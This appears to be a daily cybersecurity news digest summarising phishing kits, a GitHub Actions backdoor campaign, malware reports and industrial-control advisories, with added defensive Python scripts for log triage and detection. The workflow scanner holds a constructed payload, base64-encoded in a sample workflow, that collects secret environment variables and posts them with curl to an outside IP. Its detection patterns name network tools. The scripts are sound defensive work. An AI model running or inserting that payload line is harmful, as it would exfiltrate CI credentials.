
Hello, stay ahead with CISO Brief 🚀

Every day the cybersecurity world moves fast — new incidents, evolving AI risks, changing regulations, and critical vendor updates. We cut through the noise to deliver only what matters most for your business and security strategy.

CISO Brief brings you a daily digest of high-signal news: major breaches, hyperscaler security releases, AI and compliance shifts, and the latest threat intelligence — all in one concise update.

Built for CISOs, CTOs, and architects, our goal is to save you time, reduce distraction, and keep you always on pulse with the risks and opportunities that shape tomorrow.


Cybersecurity News Digest — Daily Briefings

Well‑Architected Software Supply Chain Best Practices

🔒 This AWS Security blog post outlines best practices for defending against software supply chain attacks, motivated by recent npm incidents like Shai‑Hulud and axios. It emphasizes reducing long‑lived credentials by using temporary credentials (AWS CLI login, IAM Identity Center, OIDC) and centralizing secrets with AWS Secrets Manager or Systems Manager Parameter Store. The article advocates layered defenses including MFA, multi‑approver workflows, artifact signing with AWS Signer, central package repositories using CodeArtifact, image scanning with Amazon Inspector, and provenance attestations for npm packages.
read more →

FBI warns of Kali365 phishing kit bypassing MFA

🔒 The FBI has alerted organisations to Kali365, a phishing-as-a-service platform that hijacks Microsoft 365 accounts without ever capturing a password and therefore gets past conventional MFA. Launched in April 2026 and sold via Telegram for as little as $250 a month, Kali365 offers AI-generated lures, automated templates, dashboards, and OAuth token capture. The kit abuses Microsoft's device code flow: the victim is sent to a genuine Microsoft sign-in page and enters a code the attacker generated, so the victim's own authentication, MFA prompt included, authorises the attacker's client and yields tokens for Outlook, Teams, and OneDrive. Because the resulting access is a legitimately issued token, containment means revoking the victim's sessions and refresh tokens, not only resetting the password. The FBI recommends blocking device code flow with a Conditional Access policy in Microsoft Entra ID and deploying phishing-resistant MFA such as hardware security keys.
read more →
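Blocking the flow is the fix; finding out whether it was already abused is the other half. The script below is an added example (not the FBI's guidance, Kali365, or Microsoft code) that triages an Entra sign-in export for device code authentications. Field names follow the Microsoft Graph `signIn` resource (`authenticationProtocol`, `conditionalAccessStatus`, `status.errorCode`) and should be confirmed against your own export; the events and the allow-listed IP range are constructed.

```python
"""Triage exported Microsoft Entra sign-in events for device code flow abuse.

Added example; not the FBI's guidance, Kali365, or Microsoft code.
Field names follow the Microsoft Graph `signIn` resource (authenticationProtocol,
conditionalAccessStatus, status.errorCode); confirm them against your own export.
All events and IP ranges below are constructed.
"""
import json
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed sample export (JSON lines): one unexpected device code sign-in,
# one ordinary interactive sign-in, one device code attempt blocked by policy.
SAMPLE_SIGNINS = r'''
{"createdDateTime":"2026-05-19T08:02:11Z","userPrincipalName":"a.rivera@example.com","ipAddress":"203.0.113.40","appDisplayName":"Microsoft Office","authenticationProtocol":"deviceCode","conditionalAccessStatus":"notApplied","status":{"errorCode":0}}
{"createdDateTime":"2026-05-19T08:05:47Z","userPrincipalName":"a.rivera@example.com","ipAddress":"198.51.100.7","appDisplayName":"Microsoft Teams","authenticationProtocol":"none","conditionalAccessStatus":"success","status":{"errorCode":0}}
{"createdDateTime":"2026-05-19T09:14:03Z","userPrincipalName":"b.chen@example.com","ipAddress":"198.51.100.9","appDisplayName":"Microsoft Azure CLI","authenticationProtocol":"deviceCode","conditionalAccessStatus":"failure","status":{"errorCode":53003}}
'''

# Constructed allow-list: sources where device code sign-ins are legitimately
# expected (a CLI jump host, for example). Everything else is suspect.
KNOWN_DEVICE_CODE_SOURCES = [ip_network("198.51.100.0/24")]


@dataclass
class Finding:
    when: str
    user: str
    ip: str
    app: str
    severity: str
    reason: str


def _known_source(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in KNOWN_DEVICE_CODE_SOURCES)


def triage(jsonl: str) -> list[Finding]:
    """Return one Finding per device code sign-in, in export order."""
    findings: list[Finding] = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev.get("authenticationProtocol") != "deviceCode":
            continue
        error_code = ev.get("status", {}).get("errorCode", -1)
        ca_status = ev.get("conditionalAccessStatus", "unknown")
        base = (ev["createdDateTime"], ev["userPrincipalName"], ev["ipAddress"], ev["appDisplayName"])
        if error_code != 0:
            # The attempt failed (53003 is the "blocked by Conditional Access" code);
            # still worth recording, because it shows someone tried the flow.
            findings.append(Finding(*base, "info", f"device code attempt failed (errorCode={error_code}, CA={ca_status})"))
        elif not _known_source(ev["ipAddress"]):
            # A victim who typed the attacker's code authorises *this* sign-in,
            # so success from an unexpected network is the Kali365 pattern.
            findings.append(Finding(*base, "high", "successful device code sign-in from an unexpected source"))
        elif ca_status == "notApplied":
            findings.append(Finding(*base, "medium", "device code sign-in succeeded with no Conditional Access policy applied"))
        else:
            findings.append(Finding(*base, "low", "device code sign-in from an expected source"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_SIGNINS):
        print(f"[{f.severity:6}] {f.when} {f.user} from {f.ip} via {f.app}: {f.reason}")
```

The "high" hits are the ones to act on: revoke the user's sessions and refresh tokens, then review what the app named in `appDisplayName` touched. The Conditional Access policy the FBI recommends is expressed in Graph as the authentication flows condition (`conditions.authenticationFlows.transferMethods` containing `deviceCodeFlow`) with a block grant; once it is in place, new attempts show up as the "info" rows above rather than the "high" ones.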

Google’s Network Strategy for the AI Era

📡 Google details how its global network and new data center fabrics are being redesigned for AI workloads, describing a vertically integrated stack anchored by an AI Hypercomputer. The post highlights Virgo Network, campus-scale and WAN innovations, and AI-native Cloud Interconnect to meet extreme bandwidth, low latency, and burst tolerance requirements. It emphasizes co-design with accelerators, autonomous reliability features, and global footprint benefits for inference and cross-site training.
read more →

Researchers Demonstrate Person Identification via Wi‑Fi

📡 Researchers show WiFi signals can reveal people and environments by analyzing how radio waves reflect, scatter, and absorb compared with expected patterns. WiFi sensing uses these variations to infer spatial structure and presence, effectively creating an image of surroundings and occupants. Thorsten Strufe of KIT explains it functions like a camera, but with radio waves instead of light, enabling recognition through signal propagation analysis.
read more →

Chinese PhaaS Grows More Sophisticated: Live Credential Theft

🛡️ Google researchers report a rapid rise in Chinese phishing-as-a-service (PhaaS) operations that have shifted from static password harvesting to real-time interception of credentials and one-time codes. These services deliver convincing lures over messaging channels such as RCS and iMessage and use live admin panels so an operator can relay a victim's OTP while it is still valid, defeating code-based MFA. The platforms monetise stolen payment details by provisioning the cards into digital wallets, and increasingly use AI to generate unique phishing pages that evade signature-based detection.
read more →

Megalodon campaign backdoors GitHub Actions at scale

🔒 Researchers at SafeDep uncovered the Megalodon campaign, which pushed 5,718 malicious commits into 5,561 public GitHub repositories during a six-hour window on May 18. The attackers modified GitHub Actions workflows to embed base64-encoded bash payloads designed to exfiltrate secrets exposed to CI runners, such as cloud credentials, SSH keys, and OIDC tokens. Using compromised personal access tokens or deploy keys and forged author identities such as build-bot, the campaign committed directly to repositories without opening pull requests, so PR-based review never saw the changes. Two payload variants were delivered: one ran on every push, the other on workflow_dispatch triggers.
read more →
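A workflow that decodes a base64 blob and pipes it into bash is the signature of this campaign, and it is cheap to scan for. The following is an added example, not SafeDep's tooling; the sample workflow and the embedded payload are constructed to resemble the reported pattern (base64-encoded bash that reads the runner's environment and posts it to an attacker host), not the campaign's real code.

```python
"""Scan GitHub Actions workflow files for Megalodon-style injected steps.

Added example; not SafeDep's tooling, and the payload below is constructed to
resemble the reported pattern (base64-encoded bash that reads CI secrets and
sends them out), not the campaign's real code.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Constructed: what an attacker might hide behind an innocuous step name.
INJECTED_PAYLOAD = (
    "env | grep -Ei 'aws|token|key|secret' | "
    "curl -s -X POST --data-binary @- https://203.0.113.5/collect"
)

# Constructed: a normal CI workflow with the injected step appended.
SAMPLE_WORKFLOW = f"""
name: ci
on:
  push:
  workflow_dispatch:
permissions:
  id-token: write
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Test
        run: npm ci && npm test
      - name: Cache warmup
        run: echo {base64.b64encode(INJECTED_PAYLOAD.encode()).decode()} | base64 -d | bash
"""

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
INLINE_DECODE = re.compile(r"base64\s+(?:-d|--decode)")
HARVEST = re.compile(r"\benv\b|printenv|/proc/\d+/environ|ACTIONS_ID_TOKEN_REQUEST|\.ssh/|secrets?|aws", re.I)
EGRESS = re.compile(r"\b(?:curl|wget|nc)\b|/dev/tcp/")
TRIGGER = re.compile(r"^\s*(push|workflow_dispatch)\s*:", re.M)


@dataclass
class Hit:
    line_no: int
    decoded: str
    indicators: list[str] = field(default_factory=list)


def scan_workflow(text: str) -> list[Hit]:
    """Decode every long base64 run and report the ones that look like a backdoor."""
    hits: list[Hit] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for blob in B64_BLOB.findall(line):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # pinned SHAs and digests match the regex too, but do not decode to text
            indicators = []
            if INLINE_DECODE.search(line):
                indicators.append("decoded and executed inline")
            if HARVEST.search(decoded):
                indicators.append("reads CI environment or secrets")
            if EGRESS.search(decoded):
                indicators.append("sends data off the runner")
            if indicators:
                hits.append(Hit(line_no, decoded, indicators))
    return hits


def triggers(text: str) -> set[str]:
    """Which of the two triggers the campaign relied on does this workflow declare?"""
    return set(TRIGGER.findall(text))


if __name__ == "__main__":
    print("triggers:", sorted(triggers(SAMPLE_WORKFLOW)))
    for h in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {h.line_no}: {', '.join(h.indicators)}\n    {h.decoded}")
```

Run it over `.github/workflows/*.yml` in every repository the compromised token could reach, not just the ones with visible commits. The decoded payload, not the blob, is what you grep and diff; a hit that both reads the environment and makes a network call is worth treating as exposure of every secret that workflow had access to, including the short-lived OIDC token if `id-token: write` was granted.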

BTMOB Android RAT: No-Code Builder Spreads Globally

🛡️ ESET researchers identified a no-code Android remote access trojan (RAT) named BTMOB that is distributed via phishing campaigns and fake app stores. The malware includes an APK builder so buyers can produce customized payloads quickly and retool lures for different countries without coding. BTMOB abuses Android Accessibility Services to escalate permissions and enable data theft, screenshots, activity recording and full remote control. Sold as a malware-as-a-service offering with relatively low pricing, it lowers the barrier for criminals and allows rapid variant turnover.
read more →

Phishing Delivers JavaScript-Driven PureLogs Variant

🛡️ FortiGuard Labs uncovered a phishing campaign using purchase-order-themed emails to deliver a RAR attachment containing an obfuscated JavaScript file that drops and executes a PowerShell script. The PowerShell payload employs fileless techniques and process hollowing to load .NET modules into a suspended MsBuild.exe process, which then extracts and runs a downloader module. The downloader retrieves a fileless PureLogs plugin from a C2 server to harvest credentials, browser data, Discord tokens, and cryptocurrency wallet information before encrypting and exfiltrating it.
read more →
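The chain above (script host launching PowerShell, PowerShell launching a bare MSBuild.exe that then gets hollowed) is visible in process-creation telemetry before any payload runs. The code below is an added example, not FortiGuard's detection logic: it walks constructed Sysmon-style events and flags an MSBuild.exe with no project or target arguments whose ancestry includes a script host or an encoded PowerShell command. Paths and command lines are constructed, and the encoded argument is a stub.

```python
"""Flag the dropper chain (JS host -> PowerShell -> MSBuild.exe with no project file)
in process-creation telemetry such as Sysmon event ID 1.

Added example; not FortiGuard's detection logic. Paths and command lines are
constructed, and the encoded PowerShell argument is a stub.
"""
import ntpath
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAGS = ("-enc", "-encodedcommand", "-e", "-ec")
BUILD_ARGS = (".csproj", ".vbproj", ".proj", ".sln", ".targets", "/t:", "-t:")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    chain: list[str]
    reason: str


# Constructed telemetry: one malicious chain and two legitimate MSBuild launches.
EVENTS = [
    ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4312, 900, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\AppData\Local\Temp\PO-2026-0519.js"'),
    ProcEvent(4400, 4312, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA..."),
    ProcEvent(4520, 4400, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              "MSBuild.exe"),  # created suspended with no work to do: the hollowing target
    ProcEvent(3000, 900, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              "devenv.exe"),
    ProcEvent(5100, 3000, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
    ProcEvent(5200, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\src\build.ps1"),
    ProcEvent(5300, 5200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.sln"),
]


def _name(ev: ProcEvent) -> str:
    return ntpath.basename(ev.image).lower()


def _ancestors(ev: ProcEvent, by_pid: dict[int, ProcEvent], depth: int = 3) -> list[ProcEvent]:
    """Parent, grandparent, ... up to `depth` hops, nearest first."""
    out: list[ProcEvent] = []
    cur = ev
    while depth and cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        out.append(cur)
        depth -= 1
    return out


def detect(events: list[ProcEvent]) -> list[Finding]:
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for ev in events:
        if _name(ev) != "msbuild.exe":
            continue
        # Real builds name a project, solution or target; a bare MSBuild.exe is unusual.
        if any(tok in ev.cmdline.lower() for tok in BUILD_ARGS):
            continue
        anc = _ancestors(ev, by_pid)
        encoded_ps = any(
            _name(a) in ("powershell.exe", "pwsh.exe")
            and any(flag in a.cmdline.lower().split() for flag in ENCODED_FLAGS)
            for a in anc
        )
        script_host = any(_name(a) in SCRIPT_HOSTS for a in anc)
        if encoded_ps or script_host:
            chain = [_name(a) for a in reversed(anc)] + [_name(ev)]
            reason = "bare MSBuild.exe spawned via " + ("encoded PowerShell" if encoded_ps else "script host")
            findings.append(Finding(ev.pid, chain, reason))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"pid {f.pid}: {' -> '.join(f.chain)}: {f.reason}")
```

The two legitimate launches (from Visual Studio and from a build script) pass because they carry a project or solution path; tune `BUILD_ARGS` to whatever your build pipelines actually pass. Once this fires, the follow-up is memory-side: the MSBuild.exe image on disk is clean, so only a scan of the live process (or a dump) shows the injected .NET modules.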

Check Point Frontier AI Readiness Jumbo Release

🛡️ This update describes Check Point’s Frontier AI Models Readiness Program and the resulting Jumbo Security Release. It outlines an AI-driven, multi-repository code-scanning initiative called BLAST that provides contextual, architecture-aware analysis to find exploitable vulnerabilities. The release includes dozens of hardening improvements and targeted fixes for multiple CVEs, and customers are urged to update to benefit from the protections.
read more →

2026 Cloud Security Report: Closing the AI Gap

🔒 The 2026 Cloud Security Report finds AI adoption has surged into production, but security architectures are lagging. While many organizations have updated strategies, few possess the architectural capability to enforce them, leaving AI systems and data exposed. The report calls for unified hybrid security architectures delivering consistent visibility, policy enforcement, and runtime controls across cloud, SaaS, and on-premises environments.
read more →

Microsoft Defender adds automatic endpoint isolation

🛡️ Microsoft is previewing a Defender for Endpoint capability that automatically isolates compromised endpoints as part of automatic attack disruption. Isolated devices are disconnected from the network to limit lateral movement and data exfiltration but remain connected to the Microsoft Defender for Endpoint service for ongoing monitoring. The feature applies to onboarded end-user workstations and can be released by security operators after investigation and remediation.
read more →

ABB zenon Remote Transport Missing Authentication

🔒 ABB has identified a vulnerability in affected versions of the ABB Ability™ zenon Remote Transport Service that permits unauthenticated use of the Reboot OS function, allowing an attacker who can reach the service to trigger a system reboot. Remote exploitation requires prior access to the target network, and ABB reports no evidence of active exploitation at this time. Workarounds include restricting network access to the service and disabling the zensyssrv.exe service where Remote Transport is not needed.
read more →

ABB AC500 V2 Modbus Buffer Over-read Advisory

🛡️ The advisory details a buffer over-read vulnerability in ABB AC500 V2 devices that can cause Modbus server responses to include fragments of earlier telegrams. Affected devices running older firmware may return invalid or appended data when presented with unsupported Modbus function codes. ABB issued a fix in AC500 V2 firmware version 2.5.3 (2016) and later; operators are urged to update and minimize network exposure. CISA republished the vendor advisory to raise visibility and recommends isolating control networks and using secure remote access.
read more →
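On the wire, the over-read shows up as a reply that is longer than a proper exception response, either with bytes past the declared MBAP length or with the length field itself inflated to cover the stale data. The validator below is an added example (not ABB's or CISA's code) that builds a request with an unsupported function code and checks a reply against the Modbus/TCP framing rules; all three reply frames are constructed.

```python
"""Check Modbus/TCP replies for the inconsistency the AC500 V2 advisory describes:
a response to an unsupported function code that carries bytes beyond a proper
exception PDU, i.e. fragments of an earlier telegram.

Added example; not ABB's or CISA's code. The frames are constructed, and the
layout is the public Modbus/TCP framing (MBAP header followed by the PDU).
"""
import struct
from dataclasses import dataclass

# MBAP header: transaction id, protocol id (always 0), length, unit id.
# `length` counts every byte after itself, so it equals 1 (unit id) + len(PDU).
MBAP = struct.Struct(">HHHB")
ILLEGAL_FUNCTION = 0x01


@dataclass
class Verdict:
    ok: bool
    detail: str


def build_request(txn: int, unit: int, function: int, data: bytes = b"") -> bytes:
    pdu = bytes([function]) + data
    return MBAP.pack(txn, 0, 1 + len(pdu), unit) + pdu


def check_response(request: bytes, response: bytes) -> Verdict:
    """Validate framing and function-code agreement between a request and its reply."""
    if len(response) < MBAP.size + 1:
        return Verdict(False, "frame shorter than MBAP header plus function code")
    txn, proto, length, unit = MBAP.unpack_from(response)
    req_txn, _, _, req_unit = MBAP.unpack_from(request)
    if proto != 0:
        return Verdict(False, f"protocol id {proto} is not Modbus (0)")
    if (txn, unit) != (req_txn, req_unit):
        return Verdict(False, "transaction id or unit id does not match the request")
    declared_pdu = length - 1
    actual_pdu = len(response) - MBAP.size
    if actual_pdu != declared_pdu:
        # Bytes past the declared length are exactly what an over-read looks like on the wire.
        return Verdict(False, f"length field declares {declared_pdu} PDU bytes, frame carries {actual_pdu} ({actual_pdu - declared_pdu:+d} trailing)")
    req_fn = request[MBAP.size]
    fn = response[MBAP.size]
    if fn & 0x80:
        if (fn & 0x7F) != req_fn:
            return Verdict(False, f"exception for function {fn & 0x7F:#04x} but request was {req_fn:#04x}")
        if declared_pdu != 2:
            # An exception PDU is function|0x80 followed by one exception code, nothing else.
            return Verdict(False, f"exception PDU should be 2 bytes, length field says {declared_pdu}")
        return Verdict(True, f"exception code {response[MBAP.size + 1]:#04x}")
    if fn != req_fn:
        return Verdict(False, f"reply function {fn:#04x} does not match request {req_fn:#04x}")
    return Verdict(True, f"normal response, {declared_pdu - 1} data bytes")


# Constructed exchange: probe with an unsupported (user-defined range) function code.
REQUEST = build_request(txn=7, unit=1, function=0x41)

# Correct reply: Illegal Function exception, exactly two PDU bytes.
GOOD_REPLY = MBAP.pack(7, 0, 3, 1) + bytes([0x41 | 0x80, ILLEGAL_FUNCTION])
# Over-read variant 1: stale bytes from an earlier read-holding-registers reply
# appended after a correctly computed length field.
TRAILING_REPLY = GOOD_REPLY + bytes([0x03, 0x02, 0x00, 0x2A])
# Over-read variant 2: the same stale bytes, but the length field was computed over them.
INFLATED_REPLY = MBAP.pack(7, 0, 7, 1) + bytes([0x41 | 0x80, ILLEGAL_FUNCTION, 0x03, 0x02, 0x00, 0x2A])


if __name__ == "__main__":
    for label, reply in (("good", GOOD_REPLY), ("trailing", TRAILING_REPLY), ("inflated", INFLATED_REPLY)):
        v = check_response(REQUEST, reply)
        print(f"{label:9} ok={v.ok} {v.detail}")
```

Pointed at a capture from the control network, the same check separates devices still on pre-2.5.3 firmware from patched ones without sending anything unusual to a PLC, which matters when the only change window is the next maintenance outage. The stale bytes in the constructed frames happen to look like a register value; on a real device they are whatever the previous telegram held, which is why the advisory treats the leak as an information-disclosure concern as well as a correctness bug.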

ABB B&R Automation Runtime SDM Denial of Service

🔒 An Improper Resource Locking vulnerability in the System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.3 and before Q4.93 may allow an unauthenticated network attacker to delete data and cause denial of service. The vendor corrected the issue in Automation Runtime 6.3 and Q4.93 and notes SDM is disabled by default in AR 6. B&R recommends applying updates, restricting SDM access, using TLS/mutual TLS, and limiting webserver access to trusted IPs.
read more →

ABB Terra AC Heap Overflow Risks and Fixes

🔒 ABB reported a heap-based buffer overflow in select Terra AC EV chargers that can be triggered via crafted OCPP messages. Exploitation may allow heap corruption, denial of service, altered firmware behaviour, or possibly remote code execution; the vendor has released patched firmware versions. ABB strongly recommends running OCPP only over TLS (wss:// rather than plaintext ws:// over HTTP), so that crafted messages cannot be injected on the path to the backend, and applying the updates promptly to reduce remote exploitation risk.
read more →

ABB Camera Connect VLC Component Vulnerabilities

🔔 ABB disclosed that several vulnerabilities exist in the VLC media player component delivered with older ABB Ability Camera Connect installers (≤ 1.5.0.14). An update (Camera Connect 1.5.0.15) and standalone VLC updates are available to remediate multiple memory-corruption and path-related issues. ABB notes that most deployments are air-gapped and isolated, which significantly reduces exposure and remote exploitability, but recommends applying updates at the earliest convenience.
read more →

Eppendorf BioFlo 320 VNC Hard‑coded Password Risk

🔒 The Eppendorf BioFlo 320 is affected by a critical-severity vulnerability (CVSS 9.8): its VNC server uses a hard-coded password. If remote access is enabled and an attacker can reach the device's network address, they gain full control of the controller interface; VNC traffic is also unencrypted, so the session itself can be observed on the wire. Eppendorf has released software version 5.0, which removes VNC access, and urges users to verify that VNC is disabled and to restrict configuration changes to the Admin and Supervisor roles.
read more →

ABB LVS MConfig: Cleartext Memory Exposure Fix

🔒 ABB disclosed a vulnerability in MConfig affecting versions listed by the vendor that allows sensitive data to be stored in cleartext in memory. An attacker with physical or local host access could export a memory dump that may include plaintext passwords. ABB released MConfig version 1.4.9.22 to remediate the issue and recommends applying defensive measures from the product manual.
read more →